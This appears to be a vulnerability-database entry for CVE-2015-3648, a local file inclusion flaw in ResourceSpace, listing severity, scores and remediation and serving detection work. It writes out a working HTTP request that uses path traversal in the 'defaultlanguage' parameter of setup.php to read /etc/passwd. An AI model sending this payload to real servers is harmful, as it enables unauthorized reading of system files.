🔙 목록으로 돌아가기

CVE-2015-3648: ResourceSpace - Local File inclusion

TitleResourceSpace - Local File inclusion
Authorpikpikcu
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
RemediationUpgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.45832
CVE IDCVE-2015-3648
CWE IDCWE-22
Tags cve2015 cve lfi resourcespace packetstorm montala vuln

🔍 Vulnerability Description

ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.

🌐 HTTP Request

GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-3648.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-3648.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A